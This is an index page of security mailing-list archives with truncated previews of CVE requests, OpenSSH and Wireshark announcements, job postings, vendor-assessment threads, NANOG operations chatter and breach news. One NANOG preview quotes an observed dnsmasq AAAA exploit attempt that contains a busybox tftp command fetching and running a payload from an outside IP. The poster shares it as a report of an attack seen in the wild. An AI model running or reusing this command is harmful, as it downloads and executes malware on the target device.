The leak is triggered if name resolution functions are called in such a
way that internal resolver data structures are only initialized
partially. The memory leak was independently reported as occurring
during Apache...
Re: CVE request: mongodb: world-readable .dbshell history file
Sébastien Delafond (Aug 01)
Whatever the umask value is, an application should apply proper
permissions on files deemed sensitive. For instance, ssh-keygen(1)
will never create a world-readable private key, regardless of what the
umask is.
Cheers,
--Seb
CVE request: XSS vulns in Dotclear v2.9.1
陈瑞琦 (Aug 01)
I found some XSS vulns in Dotclear v2.9.1
Title: XSS vulns in Dotclear v2.9.1
Author: Chen Ruiqi, Chenruiqi () 360 cn
Date: 2016-08-01
Download Site: https://dotclear.org/download
Vendor: dotclear.org
Vendor Notified: 2016-08-01
Vendor Contact: security () dotclear net
--------------------------------------------------------------------------------------------------------
Description:
Dotclear is an open source blog publishing application...
CVE Request: CSRF in Grails console
Dario Bertini (Aug 01)
The Grails console (aka Grails Debug Console, Grails Web Console) was
vulnerable to CSRF.
https://grails.org/plugin/console
https://github.com/sheehan/grails-console
(this is the plugin, not to be confused with the command line grails
console: http://docs.grails.org/3.1.1/ref/Command%20Line/console.html
)
The fix has been made available in versions 1.5.10, 2.0.7. Versions up
to 1.5.9 and 2.0.6 are affected.
This allows an attacker to (create...
Re: CVE:Request - Path Traversal Barebone.jsp - Liferay 5.1.0
cve-assign (Aug 01)
Use CVE-2016-6517.
Re: CVE Request: Linux >= 4.5 double fetch leading to heap overflow
cve-assign (Aug 01)
Use CVE-2016-6516.
Re: Re: CVE request: mongodb: world-readable .dbshell history file
Grant Ridder (Aug 01)
FWIW, the vendor has closed https://jira.mongodb.org/browse/SERVER-25335
with "Works as Designed"
-Grant
CVE:Request - Path Traversal Barebone.jsp - Liferay 5.1.0
petrella.pietro (Aug 01)
I discovered a directory traversal issue on minifierBundleDir
barebone.jsp variable on a website with Liferay 5.1.0. I don't
exclude that this vulnerability is present in other Liferay versions as
well.
However, I report the following vulnerable URL of example:...
Re: CVE request: Wireshark 2.0.5 and 1.12.13 security releases
cve-assign (Aug 01)
We think one typo ended up in your
http://openwall.com/lists/oss-security/2016/07/28/3 post:
wnpa-sec-2016-44 is Wireshark bug 12660, not 12624. Here are
the 11 CVE IDs:
CVE-2016-6503
http://www.wireshark.org/security/wnpa-sec-2016-39.html
https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12495
https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=581a17af40b84ef0c9e7f41ed0795af345b61ce1
CVE-2016-6504...
Re: cve request: systemd-machined: information exposure for docker containers
Shiz (Aug 01)
Except if a host is running with hidepid={1,2}, which is not entirely uncommon
especially in hardened systems. In that regard it /does/ qualify as infoleak.
- Shiz
Announce: OpenSSH 7.3 released
Damien Miller (Aug 01)
OpenSSH 7.3 has just been released. It will be available from the
mirrors listed at http://www.openssh.com/ shortly.
OpenSSH is a 100% complete SSH protocol 2.0 implementation and
includes sftp client and server support. OpenSSH also includes
transitional support for the legacy SSH 1.3 and 1.5 protocols
that may be enabled at compile-time.
Once again, we would like to thank the OpenSSH community for their
continued support of the project,...
Secure Coding — The Secure Coding list (SC-L) is an open forum for the discussion on developing secure applications. It is moderated by the authors of Secure Coding: Principles and Practices.
Silver Bullet 123: Yanek Korff
Gary McGraw (Jul 06)
hi sc-l,
The latest installment of Silver Bullet was posted this morning. Silver Bullet episode 123 features a conversation
with Yanek Korff. Yanek worked for many years at Cigital as a system administrator back in the early days. He then
moved on to operational security work at AOL and running managed security services at Mandiant.
We talk about managing technical people in this episode. We also discuss operational security. Have a...
[CFP] Workshop: Who are you?! Adventures in Authentication at SOUPS 2016 - Next week!
Larry Koved (Jun 20)
Title: Who are you?! Adventures in Authentication
Workshop to be held at the Twelfth Symposium on Usable Privacy and
Security - SOUPS 2016
When: June 22, 2016
Where: Denver, CO
URL: https://www.usenix.org/conference/soups2016/workshop-who-are-you
Description:
Authentication, or the act of proving that someone is who they claim to
be, is a cornerstone of security. As more time is spent using computers,
authentication is becoming both more...
Silver Bullet 122: David Nathans
Gary McGraw (Jun 07)
Hi sc-l,
The latest episode of Silver Bullet features a conversation with David Nathans from Siemens Healthcare. David got his
start in security ops, and even wrote a book about that. But he completely understands why product security is
essential in the modern world and has been moving things in the right direction when it comes to medical devices.
Have a listen: http://bit.ly/SB-nathans
As always, your feedback is welcome.
gem...
Jack from Codiscope: Static Analysis for Node.JS
Gary McGraw (May 20)
Hi sc-l,
New tech stacks call for new static analysis approaches. Check out Jacks (free for developers) from Codiscope:
https://codiscope.com/not-your-fathers-code-review/
gem
https://www.garymcgraw.com/
@cigitalgem
[CFP] Workshop CFP: Who are you?! Adventures in Authentication at SOUPS 2016 - 1 week until the submission deadline
Larry Koved (May 10)
Title: Who are you?! Adventures in Authentication
Workshop to be held at the Twelfth Symposium on Usable Privacy and
Security - SOUPS 2016
When: June 22, 2016
Where: Denver, CO
URL: https://www.usenix.org/conference/soups2016/workshop-who-are-you
Description:
Authentication, or the act of proving that someone is who they claim to
be, is a cornerstone of security. As more time is spent using computers,
authentication is becoming both more...
Silver Bullet 121: Marty Hellman
Gary McGraw (May 10)
hi sc-l,
While I was away in Europe, Silver Bullet 121 went live. This episode is an interview with recent Turing award winner
and public key crypto inventor Marty Hellman. I met Marty this year at RSA the night he won the Turing award. He’s a
hugely interesting guy.
We talk math, crypto, politics, and the history of the first two crypto wars. Marty put his own career (and freedom)
on the line in the first! It’s super interesting....
c0c0n 2016 | The cy0ps c0n - Call For Papers & Call For Workshops
c0c0n 2016 - The CyOps Conference (Apr 25)
c0c0n 2016 | The cy0ps c0n - Call For Papers & Call...
[CFP] Workshop CFP: Who are you?! Adventures in Authentication at SOUPS 2016
Larry Koved (Apr 25)
Title: Who are you?! Adventures in Authentication
Workshop to be held at the Twelfth Symposium on Usable Privacy and
Security - SOUPS 2016
When: June 22, 2016
Where: Denver, CO
URL: https://www.usenix.org/conference/soups2016
Description:
Authentication, or the act of proving that someone is who they claim to
be, is a cornerstone of security. As more time is spent using computers,
authentication is becoming both more common and...
Silver Bullet celebrates a decade of shows: Gary McGraw
Gary McGraw (Apr 01)
hi sc-l,
Hard to believe, but Silver Bullet has been running for ten years---120 months of shows in a row without missing a
month. To celebrate this accomplishment, we shot a video for episode 120 out by the Shenandoah river at my house. And
we turned the tables on the interview. Marcus Ranum, inventor of the firewall, interviews me.
We discuss: software security, internet of (crappy) things, the surveillance state, advisory board work,...
Educause Security Discussion — Securing networks and computers in an academic environment.
Information Security Analyst Position at CU Boulder
Dan Jones (Aug 01)
We have a position open here at University of Colorado that reports to me as an Information Security Analyst. The
focus is information assurance risk management, and PCIDSS compliance. The successful candidate will be someone who
values working collaboratively both within the central IT team and leadership in campus departments. Not only is this
an excellent job opportunity, but it is also a great chance to live in one of the most desirable...
Let's Get Ready for NCSAM 2016!
Valerie Vogel (Jul 25)
National Cyber Security Awareness Month (http://www.educause.edu/ncsam) is just a couple of months away. Now is the
perfect time to start planning events and activities for your campus. Join EDUCAUSE and
NCSA (http://www.staysafeonline.org/) as we celebrate the 13th annual #CyberAware month this October.
Here are a few ways you can show your support and help us make NCSAM 2016 the most successful yet!
* Become a NCSAM...
UC Santa Cruz - Multiple InfoSec Job Opportunities
Janine Roeth (Jul 20)
Hello
The University of California Santa Cruz campus is looking for dynamic
individuals to expand our information security program. These positions
report to multiple units, however, they are expected to work closely with
each other and with existing, talented security and IT personnel in a
centralized IT organization of approximately 235 staff.
*Incident Response*
Two positions will strengthen our security incident response capabilities,...
Oracle integration with a SIEM
Colin Abbott (Jul 20)
Hi,
We cannot purchase Oracle audit vault so we are looking at integrating Oracle audit data with our SIEM (currently
QRadar). I am curious if anyone else has already gone this route?
Thanks
Colin
Colin Abbott | IT Security Architect | McGill University | Network and Communication Services | 514-398-5070
Re: security assessments for cloud based vendors
Baillio, Aaron (Jul 19)
Yes, that's 100% accurate. This will certainly not replace a good old questionnaire or even give you insight into how
well they achieve NIST, ISO, (insert framework of choice here).
It's more of a benchmark to see how they compare to others in the industry and will give you an insight into some of
the following:
- Botnet infections from the institution/company
- Spam
- Malware servers (hosting malware)
- Potentially...
Re: security assessments for cloud based vendors
Andy Hooper (Jul 19)
Baillio, Aaron wrote on 19-Jul-16 15:30:
From the public blurb on vendor ratings, BitSight appears to be using
externally observable data only, not questionnaires or auditing to
standards. Is that a fair perception?
- Andy Hooper - Queen's University -
Re: security assessments for cloud based vendors
Baillio, Aaron (Jul 19)
Oh yes, they definitely cater to EDU. Now, I will caution, they have a slew of "additional" services they will try to
sell you on, but the base package is very affordable IMO. It really depends on how many schools/vendors you want to
see and compare. We started with 1, just us, and like I said, our leadership eats it up. We're looking to expand to
our conference or other schools we feel are peer research institutions to...
Re: security assessments for cloud based vendors
Rob Milman (Jul 19)
Thanks Aaron,
I have a demo scheduled with BitSight in the next couple of weeks. I'm more than curious to know how much it will cost
us to get this information. Do you happen to know if they provide discounts to budget conscious post-secondary
institutions?
Rob Milman
Security & Compliance Analyst
Information Systems
Southern Alberta Institute of Technology
EH Crandell Building, GA 214
1301 - 16...
Re: security assessments for cloud based vendors
Baillio, Aaron (Jul 19)
We started utilizing a service called BitSight which helps in this area. They basically provide a security score
similar to a FICO score on you and a selection of businesses that you choose (which you can always change). The score
comes with a breakout on how they are scored. Many companies use it as a 3rd party assessment when selecting vendors
but it also helps internally to see how your organization is doing.
It also provides a...
Re: It's been a pleasure working with you all . . .
David Renaker (Jul 19)
Mike,
Is this related to your name popping up on a 84 51 s employees linked in?
If you want to stay in touch let me know your contact information when you get settled. If you are in a CISO position
let me know.
David Renaker
From: The EDUCAUSE Security Constituent Group Listserv [mailto:SECURITY () LISTSERV EDUCAUSE EDU] On Behalf Of Carr,
Michael G
Sent: Monday, July 11, 2016 8:39 AM
To: SECURITY () LISTSERV EDUCAUSE EDU
Subject:...
Re: security assessments for cloud based vendors
Colleen Keller (Jul 19)
Hi Alex,
There are several items in the EDUCAUSE library that may be of use for you.
https://library.educause.edu/resources/2014/7/it-security-questionnaireit-standards-and-requirements-questionnaire
http://www.educause.edu/annual-conference/2015/cloud-service-procurement-and-contracting-lessons-internet2-net
https://spaces.internet2.edu/display/2014infosecurityguide/Cloud+Computing+Security
Please let me know if you have any questions, thank...
Re: security assessments for cloud based vendors
Hudson, Edward (Jul 19)
Jim,
Good points. We include language re subcontractors in our General Terms and conditions as well as some provisions in
what we call our “IT Supplementals” that speak to those points. We assign the risk and the liability as well as
responsibility to the primary vendor. Truth be told this hasn’t been tested vis-à-vis a breach or exposure from a
downstream provider but we feel we can assert that we have done what's reasonable and...
Re: security assessments for cloud based vendors
Jim Dillon (Jul 19)
Alex,
While I'm aware that we've asked for some of these items, a full evaluation (audit) of our practice is yet to be
pursued. I've reviewed cloud providers through their SOC2 as attested by a third party reviewer. Apart from
contracting a right to have a third party assessment, this is a method that may at least provide some insight into the
vendor's relative maturity.
The more interesting and growing problem is...
Re: security assessments for cloud based vendors
Velislav K Pavlov (Jul 19)
Alex we use CSA's CCM/CAIQ Registry. I share some of Ruth's observations with respect to the maturity of vendor's cloud
security controls and lack of widespread adoption of CSA's security practices. Most of the vendors are clueless as to
what we are asking for and we have to spend a lot of time educating them. If I can help my organization or another
client in a similar situation, the time spent in awareness and education...
Re: security assessments for cloud based vendors
Ruth Ginzberg (Jul 19)
Are you specifically thinking of the CSA STAR registry, or some other similar framework?
I think it’s a great idea to push cloud vendors toward more widespread adoption of these kinds of best practices.
If you look at the CSA Registry, there seems to be more widespread adoption overseas than in the USA, of the higher
levels of attainment such as 3rd party certification.
You can always try it and see what happens. The worst thing that could...
NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.
CenturyLink Executive
Dennis Burgess (Aug 02)
I have been working on a circuit outage since Monday morning, my tickets are closed, can't get ahold of anyone, no
phone calls, problem not resolved, anyone from CenturyLink Executive Team could give me a call or e-mail to see if we
can get these issues solved.
www.linktechs.net - 314-735-0270 x103 - dmburgess () linktechs net
Re: ExtremeWare
Alain Hebert (Aug 02)
Hey,
Those are still current here =D
But yes 12.x or 15.x XOS has support, but only for official EN optics.
-----
Alain Hebert ahebert () pubnix net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443
Re: Operations task management software?
Saku Ytti (Aug 02)
Hey,
I'd solicit opinions as well. There are few features I'd like to see:
1) ability to create parent+child, if all childs are closed, parent
closes if parent is closed, childs close
2) ability to create dependencies, perhaps I have some design change I
want to make, but it can't be done until large bunch of operational
work is done, I could create tickets for ops, and then create ticket
for myself, and make it depend on the...
RE: ExtremeWare
Robert Jacobs (Aug 02)
Too old.... feature was not supported on that code rev or model.
Robert Jacobs | Network Director/Architect
Direct: 832-615-7742
Main: 832-615-8000
Fax: 713-510-1650
5959 Corporate Dr. Suite 3300; Houston, TX 77036
A Certified Woman-Owned Business
24x7x365 Customer Support: 832-615-8000 | support () pslightwave com
This electronic message contains information from Phonoscope Lightwave which may be privileged and...
Re: Operations task management software?
Jeroen Wunnink (Aug 02)
We use redmine, combined with scripts that call its API to create automated tickets/tasks that NOC or engineers need
to attend to.
Has email notifications, wiki, documents, files, code repo, calendar, customisable fields all built in.
—
Jeroen Wunnink
IP Engineering Manager
Hibernia Networks - Amsterdam Office
Main numbers (Ext: 1011): USA +1.908.516.4200 | Canada +1.902.442.1780
Ireland +353.1.867.3600 | UK +44.1704.322.300 | Netherlands...
Re: Operations task management software?
Matt Ryanczak (Aug 02)
Jira works well as a task tracking system for ops. Customizable work flows,
decent integration with ldap, etc. Also good for tracking software
projects. Having both software and ops tasks in one place has many benefits.
Re: ExtremeWare
Paul Thornton (Aug 01)
Hi
Just about.
They probably do, but only in the deep runic debug mode (nofeep) which
was never a recommended practice unless you had the TAC on the 'phone.
I have a couple of old 48si boxes hanging around in the lab LAN -
Extremeware 7.8.4 certainly doesn't understand "show port n
transceiver". I think this is XOS only.
Paul.
ExtremeWare
Mike Hammett (Aug 01)
Can those that ran switches with ExtremeWare on them remember that far back?
I've got a Summit 400t-48 and I can't seem to figure out how to get DDM information from the SFP. Did they have that
ability?
-----
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com
Midwest-IX
http://www.midwest-ix.com
Re: Cloudflare, dirty networks and politricks
John (Aug 01)
....
I think even you will win in court
Russian government since a while implemented country-wide blocklist. It is
transparent and available online, and there
is a lot of cloudflare ip's (http://reestr.rublacklist.net/api/ips). First
I thought, again Putin's regime crack on freedom, but after viewing
specific cloudflare subnet as example (
http://reestr.rublacklist.net/search/1?q=104.16.) I can say, major part of
websites are online...
Re: Brighthouse Orlando Port blocking ISAKMP
Mallette, Edwin J (Aug 01)
Hi Erik,
We definitely do not filter UDP500 across our network. I'm going to reach
out to you directly to see if I can help figure out what's going on.
Cheers!
Ed
XO, Bad day?
Mark Bodley (Aug 01)
I am getting mass reports of problems on any ISP using XO for
longhaul/interconnect. Anyone @ XO care to share a status, and or ETR?
Re: Cloudflare, dirty networks and politricks
Alain Hebert (Aug 01)
While on that subject,
( And by pure coincidence )
Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe)
using OVH as a payload distribution
AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g
91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh
Obviously that host is not accessible at the moment. (GG OVH?)
I'm suspecting that the CC used to create that VM got declined on
the 1st, which...
Re: Cloudflare, dirty networks and politricks
Randy Bush (Aug 01)
and how is that working out for you?
all that is happening is the subject that won't die is being a dos on
this list (yes, including this response)
randy
Re: Cloudflare, dirty networks and politricks
Baldur Norddahl (Aug 01)
What is that supposed to accomplish? Cloudflare will still be helping
selling DDoS attacks on my network.
No it is not the same as asking Cloudflare to do the sensible thing:
Cloudflare profits on DDoS attacks. We are the victims.
Cloudflare can dump just the obvious criminal customers. The ones they
got abuse complaints about so they know which ones to look at. If we
block Cloudflare there will be collateral damage to all legit Cloudflare...
Re: Cloudflare, dirty networks and politricks
bzs (Jul 31)
Besides legal costs I've informed customers that I will charge them
(insert billable hourly rate) for any complaints or similar our staff
has to field beyond what we'd consider a normal volume which is pretty
low.
One guy who wasn't quite to the level of spamming as usually
conceived, not in intent, but ran a professional content list but had
a bad habit of wholesale adding mail addresses -- this was quite a
while ago when such...
Interesting People — David Farber moderates this list for discussion involving internet governance, infrastructure, and any other topics he finds fascinating
The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.
Risks Digest 29.65
RISKS List Owner (Jul 28)
RISKS-LIST: Risks-Forum Digest Thursday 28 July 2016 Volume 29 : Issue 65
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.65.html>
The current issue can also...
Risks Digest 29.64
RISKS List Owner (Jul 25)
RISKS-LIST: Risks-Forum Digest Monday 25 July 2016 Volume 29 : Issue 64
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.64.html>
The current issue can also...
Risks Digest 29.63
RISKS List Owner (Jul 21)
RISKS-LIST: Risks-Forum Digest Thursday 21 July 2016 Volume 29 : Issue 63
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.63.html>
The current issue can also...
Risks Digest 29.62
RISKS List Owner (Jul 19)
RISKS-LIST: Risks-Forum Digest Tuesday 19 July 2016 Volume 29 : Issue 62
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.62.html>
The current issue can also...
Risks Digest 29.61
RISKS List Owner (Jul 15)
RISKS-LIST: Risks-Forum Digest Friday 15 July 2016 Volume 29 : Issue 61
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.61.html>
The current issue can also...
Risks Digest 29.60
RISKS List Owner (Jul 14)
RISKS-LIST: Risks-Forum Digest Thursday 14 July 2016 Volume 29 : Issue 60
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.60.html>
The current issue can also...
Risks Digest 29.59
RISKS List Owner (Jun 28)
RISKS-LIST: Risks-Forum Digest Tuesday 28 June 2016 Volume 29 : Issue 59
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.59.html>
The current issue can also...
Risks Digest 29.58
RISKS List Owner (Jun 21)
RISKS-LIST: Risks-Forum Digest Tuesday 21 June 2016 Volume 29 : Issue 58
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.58.html>
The current issue can also...
Risks Digest 29.57
RISKS List Owner (Jun 18)
RISKS-LIST: Risks-Forum Digest Saturday 18 June 2016 Volume 29 : Issue 57
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.57.html>
The current issue can also...
Risks Digest 29.56
RISKS List Owner (Jun 15)
RISKS-LIST: Risks-Forum Digest Wednesday 15 June 2016 Volume 29 : Issue 56
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.56.html>
The current issue can...
Risks Digest 29.55
RISKS List Owner (Jun 07)
RISKS-LIST: Risks-Forum Digest Tuesday 7 June 2016 Volume 29 : Issue 55
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.55.html>
The current issue can also...
Risks Digest 29.54
RISKS List Owner (May 29)
RISKS-LIST: Risks-Forum Digest Sunday 29 May 2016 Volume 29 : Issue 54
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.54.html>
The current issue can also be...
Risks Digest 29.53
RISKS List Owner (May 20)
RISKS-LIST: Risks-Forum Digest Friday 20 May 2016 Volume 29 : Issue 53
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.53.html>
The current issue can also be...
Risks Digest 29.52
RISKS List Owner (May 10)
RISKS-LIST: Risks-Forum Digest Tuesday 10 May 2016 Volume 29 : Issue 52
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.52.html>
The current issue can also...
Risks Digest 29.51
RISKS List Owner (May 06)
RISKS-LIST: Risks-Forum Digest Friday 6 May 2016 Volume 29 : Issue 51
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.51.html>
The current issue can be found...
BreachExchange — BreachExchange focuses on all things data breach. Topics include actual data breaches, cyber insurance, risk management, metrics and more. This archive includes its predecessor, the Data Loss news and discussion lists.
Disaster recovery plans are key to keeping business afloat
Audrey McNeil (Aug 02)
http://www.itbusinessnet.com/article/Disaster-recovery-plans-are-key-to-keeping-business-afloat-4539060
Disaster is not exclusive to one industry. Across the board, there are a
number of foreseeable incidents that threaten to stop business; whether
it's a ransomware attack or internal threat, storms or power outages, the
impact of downtime can have serious consequences. In 2016, more than 30
percent of businesses faced 50 or more cyber...
Disney Playdom Forums Suffer Data Breach
Audrey McNeil (Aug 02)
http://news.softpedia.com/news/disney-playdom-forums-suffer-data-breach-506823.shtml
According to Disney's statement, the company learned on July 12 that an
attacker breached the playdomforums.com servers on July 9 and then on July
12.
The Playdom Forums are Disney Interactive's official forums for games such
as Star Wars: Commander, Marvel: Avengers Alliance (MAA), Marvel: Avengers
Alliance Mobile (mMAA), and Disney Hidden Worlds...
Phishing, ransomware the new norm
Audrey McNeil (Aug 02)
http://www.fosters.com/article/20160731/NEWS/160739967
It seems like every week there is a new threat that needs to be confronted.
We have all become accustomed to viruses and malware, but phishing and
ransomware are the new norm.
Phishing is an attempt to obtain sensitive information via electronic mail
by masquerading as a trusted entity. I’m sure you’ve seen it yourself. You
receive an email seemingly from someone you know. It may ask...
Crypto Malware: Responding To Machine-Timescale Breaches
Audrey McNeil (Aug 02)
http://www.darkreading.com/vulnerabilities---threats/crypto-malware-responding-to-machine-timescale-breaches/a/d-id/1326456
The thousand-fold increase in crypto-malware highlights a profound change
in the cyber-landscape: Previously, an attacker seeking to steal
intellectual property, personal identifiable information or payment card
information would need to successfully breach and persist on one or more
endpoints, carefully research the...
Steps To Keep Data Secure And Compliant
Audrey McNeil (Aug 02)
http://www.cxotoday.com/story/steps-to-keep-data-secure-and-compliant/
It can be notoriously hard for organizations to govern their entire data.
Governments all over the world have started taking the job of protecting
consumers seriously, especially in industries like banking, healthcare and
telecom. Over the last few years, they have opened their eyes to the
pressing issue of data security and poor management of sensitive
information. In...
Smith seeks information and documents related to OPM data breach
Audrey McNeil (Aug 01)
https://riponadvance.com/stories/smith-seeks-information-documents-related-opm-data-breach/
House Science, Space, and Technology Committee Chairman Lamar Smith (R-TX)
recently sought documents related to an Office of Personnel Management
(OPM) data breach that could have exposed information to foreign nationals.
Smith requested the information in letters to Office of Management and
Budget (OMB) Director Shaun Donovan and acting OPM Director...
How data breaches have driven the updated PCI standard
Audrey McNeil (Aug 01)
http://www.hotelmanagement.net/tech/how-data-breaches-have-driven-updated-pci-standard
The Payment Card Industry Security Standards Council published a new
version of its data security standard, which businesses around the world
use to safeguard payment data before, during and after a purchase is made.
PCI Data Security Standard version 3.2 replaces version 3.1 to address
growing threats to customer payment information. Companies that accept,...
Attack attribution does little to improve enterprise security
Audrey McNeil (Aug 01)
http://www.networkworld.com/article/3101727/security/attack-attribution-does-little-to-improve-enterprise-security.html
After every major data breach, the security community engages in a game of
whodunit and attempts to figure out what entity or nation state carried out
the attack. The North Koreans were behind the Sony breach, while China
carried out the attack on the Office of Personnel Management (OPM).
Meanwhile, hackers linked to the...
Building an Effective Incident Response Plan
Audrey McNeil (Aug 01)
http://www.infosecurity-magazine.com/opinions/building-an-effective-incident/
When it comes to incident response and a company’s ability to manage a data
breach, no organization can afford to be caught off guard. The effects of
an uncontrolled and poorly managed data breach can be catastrophic to
businesses of all sizes, not to mention the public relations nightmare and
subsequent liability that can ensue when an organization drops the ball in...
Sony Pictures Sued Over Hack (Again)
Audrey McNeil (Aug 01)
http://gizmodo.com/sony-pictures-sued-over-data-hack-again-1784515296
Nearly 18 months after (supposedly) North Korean hackers gained access to a
huge amount of data from Sony Pictures Entertainment, including emails,
unreleased scripts, and full-length films, the creators of To Write Love on
Her Arms are suing Sony over its failure to protect the film from piracy.
They want $8.7 million in damages.
First posted by The Hollywood Reporter, the...
FTC Overturns Dismissal of Security Case Against LabMD
Audrey McNeil (Aug 01)
http://www.databreachtoday.com/ftc-overturns-dismissal-security-case-against-labmd-a-9296
The Federal Trade Commission has overturned a decision made last fall by
its own administrative law judge to dismiss the agency's longstanding data
security enforcement case against the now-shuttered medical testing
laboratory LabMD. Company CEO Michael Daugherty plans to appeal in the
federal courts.
In the commissioners' unanimous opinion...
5 Reasons You Can't Ignore This New Rise in Cyber Crime
Audrey McNeil (Jul 29)
http://www.inc.com/adam-levin/5-reasons-you-cant-ignore-this-new-rise-in-cyber-crime.html
When it comes to studies, surveys and reports sent my way that dissect
various nuances of the cyber wild, my cup runneth over.
So, I've assembled a small grouping of revelatory proof points that convey
the rising maliciousness made possible by the way we've chosen to live our
digital lives--and also highlight specific cyber exposures that concern...
We Need to Change the Psychology of Security
Audrey McNeil (Jul 29)
http://motherboard.vice.com/en_ca/read/we-need-to-change-the-psychology-of-security
There are a wide variety of opinions on how to fix security and stop the
seemingly endless parade of breaches. Like many, I believe the problem is
multi-faceted: it’s more than just a lack of encryption, the inability to
block malware, or that IT professionals don’t do "the basics," though these
all contribute to security failures. I believe we have...
Rare data breach claim against a county settled for $1M
Audrey McNeil (Jul 29)
http://legalnewsline.com/stories/510964306-rare-data-breach-claim-against-a-county-settled-for-1m
Hundreds of Mille Lacs County, Minn. residents went to bed on July 1 with a
million reasons to feel a little better.
On that day, a settlement was announced between residents and Mille Lacs
County and Mikki Jo Peterick, a former child support investigator for the
Mille Lacs County Department of Family Services, in a case that involved...
Protecting Your Organization with Automated Cyber Security Incident Response
Audrey McNeil (Jul 29)
http://www.tmcnet.com/sectors/security/articles/423523-protecting-organization-with-automated-cyber-security-incident-response.htm
Recent news reports about massive data breaches have unfortunately, quickly
become commonplace. Now, the conversation has increasingly turned to
ransomware. If you’re not yet familiar with ransomware, it is the latest
method cyber criminals are using to infiltrate the computer systems of
unsuspecting victims and...
Metasploit — Development discussion for Metasploit, the premier open source remote exploitation tool
nullcon se7en CFP is open
nullcon (Aug 25)
Dear Friends,
Welcome to nullcon se7en!
$git commit -a <sin>
<sin> := wrath | pride | lust | envy | greed | gluttony | sloth
nullcon is an annual security conference held in Goa, India. The focus
